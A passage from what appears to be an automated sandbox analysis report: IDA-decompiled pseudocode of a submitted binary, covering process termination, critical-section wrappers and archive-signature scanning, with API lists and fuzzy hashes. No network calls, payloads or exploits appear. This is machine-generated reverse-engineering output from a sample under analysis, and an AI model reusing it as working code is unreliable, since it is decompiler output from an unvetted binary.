                              											E00401EE5( *(_t110 + 0xc),  *((intOrPtr*)(_t110 - 0x2c)));
                              											L16:
                              											_t103 = _t103 + 1;
                              											_t91 = _t91 + 1;
                              											while(1) {
                              												_t75 = _t109;
                              												if( *(_t110 - 0xd) != 0) {
                              												}
                              												goto L17;
                              											}
                              											goto L12;
                              										}
                              									}
                              								}
                              								goto L25;
                              								L17:
                              								_t39 = _t110 - 0x14; // 0x414be4
                              								if(_t103 > _t75 -  *_t39) {
                              									goto L20;
                              								} else {
                              									_t40 = _t110 - 0x14; // 0x414be4
                              									_t81 = E004134D0(_t91,  *((intOrPtr*)(_t110 - 0x30)),  *_t40);
                              									_t112 = _t112 + 0xc;
                              									if(_t81 != 0) {
                              										goto L16;
                              									} else {
                              										_t103 = _t103 +  *((intOrPtr*)(_t110 - 0x14));
                              										_t91 = _t91 +  *((intOrPtr*)(_t110 - 0x14));
                              										 *(_t110 - 0xd) = 1;
                              										continue;
                              									}
                              									goto L26;
                              								}
                              								goto L25;
                              							}
                              						}
                              						L25:
                              						 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
                              						E00405975(_t110 - 0x1c);
                              						_t73 = _t89;
                              						goto L26;
                              					}
                              					L24:
                              					_t89 = 0;
                              					goto L25;
                              				} else {
                              					 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
                              					E00405975(_t110 - 0x1c);
                              					_t73 = 0;
                              				}
                              				L26:
                              				 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
                              				return _t73;
                              			}


                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: KA$KA
                              • API String ID: 3519838083-594506476
                              • Opcode ID: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                              • Instruction ID: 3866b3b7da3d7396f9922ec017f7e66c93d936b9f161a27d318f0a0663603341
                              • Opcode Fuzzy Hash: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                              • Instruction Fuzzy Hash: 7451CF72D042199FDF11DFA4C940BEEBBB4AF05394F14416AE851732E2E3789E85CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

Control-flow Graph: interactive graph not reproduced; function at 416cb8-416d55, nodes call 416d5d, GetCurrentProcess, TerminateProcess, 416d6f, 416d66 and ExitProcess.
                              C-Code - Quality: 80%
                              			E00416CB8(void* __esi, int _a4, intOrPtr _a8, char _a12) {
                              				intOrPtr _t9;
                              				intOrPtr* _t11;
                              				char _t16;
                              				intOrPtr _t22;
                              				intOrPtr _t23;
                              				void* _t24;
                              				intOrPtr* _t25;
                              				void* _t27;
                              				void* _t32;
                              
                              				_t24 = __esi;
                              				E00416D5D();
                              				_t23 = 1;
                              				_t27 =  *0x423400 - _t23; // 0x1
                              				if(_t27 == 0) {
                              					TerminateProcess(GetCurrentProcess(), _a4);
                              				}
                              				_t16 = _a12;
                              				 *0x4233fc = _t23;
                              				 *0x4233f8 = _t16;
                              				if(_a8 == 0) {
                              					_t9 =  *0x425a10; // 0x5204c8
                              					if(_t9 != 0) {
                              						_t22 =  *0x425a0c; // 0x5204d0
                              						_push(_t24);
                              						_t4 = _t22 - 4; // 0x5204cc
                              						_t25 = _t4;
                              						if(_t25 >= _t9) {
                              							do {
                              								_t11 =  *_t25;
                              								if(_t11 != 0) {
                              									 *_t11();
                              								}
                              								_t25 = _t25 - 4;
                              								_t32 = _t25 -  *0x425a10; // 0x5204c8
                              							} while (_t32 >= 0);
                              						}
                              					}
                              					E00416D6F(0x420044, 0x420048);
                              				}
                              				E00416D6F(0x42004c, 0x420054);
                              				if(_t16 == 0) {
                              					 *0x423400 = _t23; // executed
                              					ExitProcess(_a4);
                              				}
                              				return E00416D66();
                              			}


                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CCD
                              • TerminateProcess.KERNEL32(00000000,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CD4
                              • ExitProcess.KERNEL32 ref: 00416D55
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                              • Instruction ID: 207b1b8771569bb39d21ff3be241c2a042127402aedffa1bc22b33ac5a943006
                              • Opcode Fuzzy Hash: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                              • Instruction Fuzzy Hash: 7A01C4323002119BD630AF69FC86A9A7BA5FB41715BA2802FF45057151DB7CD8C28B5D
                              Uniqueness

                              Uniqueness Score: -1.00%

Control-flow Graph: interactive graph not reproduced; function at 407093-4070f2, nodes call 413954, EnterCriticalSection, 4065b2, 406505 and LeaveCriticalSection.
                              C-Code - Quality: 100%
                              			E00407093(intOrPtr* __ecx) {
                              				intOrPtr* _t15;
                              				void* _t16;
                              				void* _t22;
                              				struct _CRITICAL_SECTION* _t23;
                              				void* _t25;
                              				intOrPtr* _t26;
                              				intOrPtr* _t29;
                              				void* _t30;
                              
                              				E00413954(E00419874, _t30);
                              				_t26 = __ecx;
                              				_t23 = __ecx + 4;
                              				 *(_t30 - 0x10) = _t23;
                              				EnterCriticalSection(_t23);
                              				_t15 =  *_t26;
                              				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                              				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
                              				if(_t16 == 0) {
                              					_t29 =  *_t26;
                              					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
                              				}
                              				LeaveCriticalSection(_t23);
                              				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                              				return _t16;
                              			}


                              APIs
                              • __EH_prolog.LIBCMT ref: 00407098
                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070A9
                              • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070DD
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterH_prologLeave
                              • String ID:
                              • API String ID: 367238759-0
                              • Opcode ID: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                              • Instruction ID: a56bdc6fde0de93627b634a906b5586fd045a2fb55df8f4462ae58feb39c4b8d
                              • Opcode Fuzzy Hash: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                              • Instruction Fuzzy Hash: D7018176A00204EFCB118F94CC08B9ABBB5FF48715F00841AFD12E7250C3B4A910CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

Control-flow Graph: interactive graph not reproduced; function at 40dd8b-40df29, nodes call 413954, 40776f, 40df2c, 4076d5, 414090, 406505, 403a9c, 413980 and 4065b2.
                              C-Code - Quality: 95%
                              			E0040DD8B(void* __ecx, void* __eflags) {
                              				intOrPtr _t57;
                              				intOrPtr _t65;
                              				intOrPtr _t67;
                              				intOrPtr _t69;
                              				intOrPtr _t71;
                              				intOrPtr* _t75;
                              				intOrPtr* _t80;
                              				void* _t83;
                              				intOrPtr _t85;
                              				intOrPtr _t93;
                              				void* _t95;
                              				void* _t98;
                              				intOrPtr* _t100;
                              				intOrPtr _t104;
                              				intOrPtr _t107;
                              				intOrPtr _t109;
                              				intOrPtr _t110;
                              				intOrPtr* _t111;
                              				void* _t113;
                              				intOrPtr _t115;
                              				void* _t116;
                              				void* _t118;
                              				void* _t119;
                              				void* _t121;
                              
                              				E00413954(E0041A630, _t116);
                              				_t119 = _t118 - 0x20;
                              				_t113 = __ecx;
                              				_t83 = __ecx + 0x28;
                              				_t107 = 0x20;
                              				_t57 = E0040776F(__eflags, _t107); // executed
                              				if(_t57 == 0) {
                              					if(E0040DF2C(_t83) == 0) {
                              						__eflags = 0;
                              						 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
                              						 *((intOrPtr*)(_t116 - 0x28)) = 0;
                              						 *((intOrPtr*)(_t116 - 0x24)) = 0;
                              						 *((intOrPtr*)(_t116 - 4)) = 0;
                              						E004076D5(_t116 - 0x2c, 0x10000);
                              						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
                              						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
                              						E00414090( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
                              						_t109 =  *((intOrPtr*)(_t113 + 0x20));
                              						_t85 =  *((intOrPtr*)(_t113 + 0x24));
                              						_t121 = _t119 + 0xc;
                              						while(1) {
                              							L4:
                              							_t100 =  *((intOrPtr*)(_t116 + 0xc));
                              							__eflags = _t100;
                              							if(_t100 == 0) {
                              								goto L8;
                              							}
                              							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
                              							asm("sbb eax, [esi+0x24]");
                              							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
                              							if(__eflags > 0) {
                              								L25:
                              								_t115 = 1;
                              							} else {
                              								if(__eflags < 0) {
                              									goto L8;
                              								} else {
                              									__eflags = _t95 -  *_t100;
                              									if(_t95 >  *_t100) {
                              										goto L25;
                              									} else {
                              										while(1) {
                              											L8:
                              											_t65 =  *((intOrPtr*)(_t116 - 0x10));
                              											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
                              											__eflags = _t67;
                              											if(_t67 != 0) {
                              												break;
                              											}
                              											_t69 =  *((intOrPtr*)(_t116 - 0x20));
                              											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
                              											__eflags = _t69;
                              											if(_t69 == 0) {
                              												goto L25;
                              											} else {
                              												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
                              												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
                              													continue;
                              												} else {
                              													_t104 = 0;
                              													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
                              													 *((intOrPtr*)(_t116 - 0x14)) = 0;
                              													__eflags = _t71;
                              													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
                              													if(_t71 <= 0) {
                              														_t93 =  *((intOrPtr*)(_t116 - 0x18));
                              														goto L23;
                              													} else {
                              														while(1) {
                              															_t93 =  *((intOrPtr*)(_t116 - 0x18));
                              															while(1) {
                              																L15:
                              																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
                              																if( *((char*)(_t104 + _t93)) == 0x37) {
                              																	break;
                              																}
                              																__eflags = _t104 - _t71;
                              																if(__eflags < 0) {
                              																	_t104 = _t104 + 1;
                              																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
                              																	continue;
                              																}
                              																L19:
                              																if(__eflags == 0) {
                              																	L23:
                              																	_t109 = _t109 + _t71;
                              																	asm("adc ebx, 0x0");
                              																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
                              																	E00413980(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
                              																	_t121 = _t121 + 0xc;
                              																	goto L4;
                              																} else {
                              																	_t75 = E0040DF2C(_t93 + _t104);
                              																	__eflags = _t75;
                              																	if(_t75 != 0) {
                              																		E00414090(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
                              																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
                              																		_t80 =  *((intOrPtr*)(_t116 + 8));
                              																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
                              																		_t98 = 0;
                              																		asm("adc ebx, ecx");
                              																		_t111 = _t110 + 0x20;
                              																		__eflags = _t111;
                              																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
                              																		asm("adc ebx, ecx");
                              																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
                              																		goto L27;
                              																	} else {
                              																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
                              																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
                              																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
                              																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
                              																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
                              																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
                              																			continue;
                              																		} else {
                              																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
                              																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
                              																			goto L23;
                              																		}
                              																	}
                              																}
                              																goto L28;
                              															}
                              															__eflags = _t104 - _t71;
                              															goto L19;
                              														}
                              													}
                              												}
                              											}
                              											goto L28;
                              										}
                              										L27:
                              										_t115 = _t67;
                              									}
                              								}
                              							}
                              							L28:
                              							 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
                              							E00403A9C( *((intOrPtr*)(_t116 - 0x24)));
                              							_t57 = _t115;
                              							goto L29;
                              						}
                              					} else {
                              						_t57 = 0;
                              					}
                              				}
                              				L29:
                              				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
                              				return _t57;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-3916222277
                              • Opcode ID: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                              • Instruction ID: cf89379ab294d4739916b9706e3dd1d7b183837ff3903d8a06049ba810aa014c
                              • Opcode Fuzzy Hash: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                              • Instruction Fuzzy Hash: 19515E71E006069BDB14DFA9C881ABFB7B5EF98304F14853AE405BB381D778A9458BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 95%
                              			E00403113(intOrPtr* __ecx, void* __eflags) {
                              				void* _t63;
                              				intOrPtr _t64;
                              				intOrPtr _t68;
                              				intOrPtr _t73;
                              				intOrPtr* _t82;
                              				void* _t85;
                              				void* _t87;
                              				void* _t121;
                              				void* _t124;
                              				intOrPtr _t126;
                              				intOrPtr* _t129;
                              				void* _t131;
                              
                              				E00413954(E004192B0, _t131);
                              				_t129 = __ecx;
                              				E00402EE1(_t131 - 0x40);
                              				_push( *((intOrPtr*)(__ecx + 4)));
                              				 *((intOrPtr*)(_t131 - 4)) = 0;
                              				_t63 = E00405841(_t131 - 0x68, _t121); // executed
                              				if(_t63 != 0) {
                              					_t64 =  *((intOrPtr*)(__ecx + 0x1c));
                              					__eflags = _t64;
                              					if(_t64 == 0) {
                              						 *((intOrPtr*)(_t131 - 0x10)) = 0;
                              					} else {
                              						 *((intOrPtr*)(_t131 - 0x10)) = _t64 + 4;
                              					}
                              					E004032A8(_t131 - 0x30, 4);
                              					 *((intOrPtr*)(_t131 - 0x30)) = 0x41b378;
                              					_t126 = _t129 + 0x28;
                              					 *((char*)(_t131 - 4)) = 1;
                              					_t68 = E00408F0A(_t126,  *_t129, _t131 - 0x30, 0, 0, _t129 + 4,  *((intOrPtr*)(_t131 - 0x10))); // executed
                              					 *((intOrPtr*)(_t129 + 0x60)) = _t68;
                              					 *((char*)(_t131 - 4)) = 0;
                              					E004042AD(_t131 - 0x30);
                              					__eflags =  *((intOrPtr*)(_t129 + 0x60));
                              					if( *((intOrPtr*)(_t129 + 0x60)) == 0) {
                              						E00401CE1(_t131 - 0x1c, _t129 + 0x10);
                              						 *((char*)(_t131 - 4)) = 2;
                              						E00405D0B(_t131 - 0x1c);
                              						_t73 = E004049DD( *((intOrPtr*)(_t131 - 0x1c))); // executed
                              						__eflags = _t73;
                              						if(__eflags != 0) {
                              							E00401C80(_t131 - 0x28, L"Default");
                              							 *((char*)(_t131 - 4)) = 4;
                              							E00402685( *((intOrPtr*)(_t129 + 0x1c)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4)))), _t131 - 0x1c, _t131 - 0x28, _t131 - 0x50, 0);
                              							 *((char*)(_t131 - 4)) = 2;
                              							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
                              							_t82 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4))));
                              							 *((intOrPtr*)(_t129 + 0x60)) =  *((intOrPtr*)( *_t82 + 0x1c))(_t82, 0, 0xffffffff, 0,  *((intOrPtr*)(_t129 + 0x20)));
                              							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
                              							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                              							goto L11;
                              						} else {
                              							_push(_t131 - 0x1c);
                              							_t124 = 9;
                              							_t87 = E00409569(_t131 - 0x28, _t124, __eflags);
                              							 *((char*)(_t131 - 4)) = 3;
                              							E00401D7A(_t129 + 0x64, _t87);
                              							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
                              							 *((intOrPtr*)(_t129 + 0x60)) = 0x80004005;
                              							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
                              							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                              						}
                              					} else {
                              						E00401D1B(_t129 + 0x64,  *0x420320);
                              						goto L7;
                              					}
                              				} else {
                              					E00401D1B(__ecx + 0x64,  *0x42031c);
                              					 *((intOrPtr*)(__ecx + 0x60)) = 0x80004005;
                              					L7:
                              					_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                              					L11:
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t131 - 0xc));
                              				return _t85;
                              			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 00403118
                                • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 004049DD: __EH_prolog.LIBCMT ref: 004049E2
                                • Part of subcall function 00409569: __EH_prolog.LIBCMT ref: 0040956E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: Default
                              • API String ID: 3519838083-753088835
                              • Opcode ID: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                              • Instruction ID: 6c236086827897a16f525891fa60e3e62c5941a793998487ad20a929e2e28791
                              • Opcode Fuzzy Hash: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                              • Instruction Fuzzy Hash: 76516071900609EFCB10EFA5D8859EEBBB8FF08318F00456FE45277291DB38AA05CB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 85%
                              			E00402F15(intOrPtr __ecx, void* __edx, void* __eflags) {
                              				intOrPtr _t57;
                              				void* _t73;
                              				intOrPtr _t90;
                              				void* _t109;
                              				intOrPtr _t115;
                              				intOrPtr _t116;
                              				void* _t118;
                              
                              				E00413954(E00419269, _t118);
                              				 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) = 0;
                              				E00403376(_t118 - 0x94);
                              				 *(_t118 - 4) = 0;
                              				 *((intOrPtr*)(_t118 - 0x94)) = __ecx;
                              				E00401D7A(_t118 - 0x90, __edx);
                              				E00401D7A(_t118 - 0x84,  *((intOrPtr*)(_t118 + 8)));
                              				_push(0xf0);
                              				_t90 = E00403A76();
                              				 *((intOrPtr*)(_t118 + 8)) = _t90;
                              				 *(_t118 - 4) = 1;
                              				if(_t90 == 0) {
                              					_t57 = 0;
                              					__eflags = 0;
                              				} else {
                              					_t57 = E004034E3(_t90);
                              				}
                              				 *(_t118 - 4) = 0;
                              				 *((intOrPtr*)(_t118 - 0x78)) = _t57;
                              				E0040640D(_t118 - 0x74, _t57);
                              				if( *((intOrPtr*)(_t118 + 0xc)) == 0) {
                              					E00403113(_t118 - 0x94, __eflags);
                              					goto L8;
                              				} else {
                              					 *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xd8)) = 1;
                              					 *((intOrPtr*)(_t118 + 0xc)) = 0;
                              					 *(_t118 - 4) = 2;
                              					_t116 = E00413220(_t118 + 0xc, E004032E1, _t118 - 0x94);
                              					if(_t116 == 0) {
                              						 *((intOrPtr*)(_t118 - 0x18)) = 0;
                              						 *((intOrPtr*)(_t118 - 0x14)) = 0;
                              						 *((intOrPtr*)(_t118 - 0x10)) = 0;
                              						E00402170(_t118 - 0x18, 3);
                              						_t109 = 0x45;
                              						 *(_t118 - 4) = 3;
                              						_t73 = E0040602F(_t109);
                              						 *(_t118 - 4) = 4;
                              						E00401D7A(_t118 - 0x18, _t73);
                              						 *(_t118 - 4) = 3;
                              						E00403A9C( *((intOrPtr*)(_t118 - 0x24)));
                              						_push(_t118 + 0xc);
                              						_push(_t118 - 0x18);
                              						E0040309D( *((intOrPtr*)(_t118 - 0x78)));
                              						E00403A9C( *((intOrPtr*)(_t118 - 0x18)));
                              						 *(_t118 - 4) = 0;
                              						E004131E0(_t118 + 0xc);
                              						L8:
                              						_t38 = _t118 + 0x14; // 0x414be4
                              						_t115 =  *_t38;
                              						E00401D7A(_t115, _t118 - 0x30);
                              						__eflags =  *((intOrPtr*)(_t115 + 4));
                              						if(__eflags == 0) {
                              							__eflags =  *((intOrPtr*)(_t118 - 0x78)) + 0xe4;
                              							E00401D7A(_t115,  *((intOrPtr*)(_t118 - 0x78)) + 0xe4);
                              						}
                              						_t116 =  *((intOrPtr*)(_t118 - 0x34));
                              						 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xe0));
                              					} else {
                              						E004131E0(_t118 + 0xc);
                              					}
                              				}
                              				 *(_t118 - 4) =  *(_t118 - 4) | 0xffffffff;
                              				E0040348A(_t118 - 0x94,  *(_t118 - 4));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
                              				return _t116;
                              			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 00402F1A
                                • Part of subcall function 00403376: __EH_prolog.LIBCMT ref: 0040337B
                                • Part of subcall function 004034E3: __EH_prolog.LIBCMT ref: 004034E8
                                • Part of subcall function 0040309D: __EH_prolog.LIBCMT ref: 004030A2
                                • Part of subcall function 0040309D: ShowWindow.USER32(00414BE4,00000001,000001F4,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030FB
                                • Part of subcall function 004131E0: CloseHandle.KERNEL32(00000000,00000000,00403035,?,?,00000000,00000003,?,00000000,?,?,00000000,00000000,00000000), ref: 004131EA
                                • Part of subcall function 004131E0: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 004131F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$CloseErrorHandleLastShowWindow
                              • String ID: KA
                              • API String ID: 2740091781-4133974868
                              • Opcode ID: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                              • Instruction ID: b66072ba2aa71961cefff889ac2f3310996ab01b533407b8592e0c78779ee57e
                              • Opcode Fuzzy Hash: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                              • Instruction Fuzzy Hash: 2F41AF31900249DBCB11EFA5C991AEDBBB8AF14314F1480BFE906B72D2DB385B45CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E00408902(intOrPtr* __ecx) {
                              				long _t33;
                              				intOrPtr* _t34;
                              				intOrPtr* _t35;
                              				intOrPtr* _t39;
                              				intOrPtr* _t43;
                              				intOrPtr* _t59;
                              				long _t62;
                              				intOrPtr* _t64;
                              				void* _t65;
                              
                              				E00413954(E00419B00, _t65);
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t59 = __ecx;
                              				 *((intOrPtr*)(_t65 - 0x14)) = 0;
                              				 *(_t65 - 4) = 0;
                              				 *((intOrPtr*)(_t65 - 0x10)) = 0;
                              				 *(_t65 - 4) = 1;
                              				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
                              					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
                              						goto L12;
                              					} else {
                              						_push(0x10);
                              						_t39 = E00403A76();
                              						if(_t39 == 0) {
                              							_t64 = 0;
                              						} else {
                              							 *((intOrPtr*)(_t39 + 4)) = 0x41b5e8;
                              							 *((intOrPtr*)(_t39 + 8)) = 0;
                              							 *(_t39 + 0xc) =  *(_t39 + 0xc) | 0xffffffff;
                              							 *_t39 = 0x41b494;
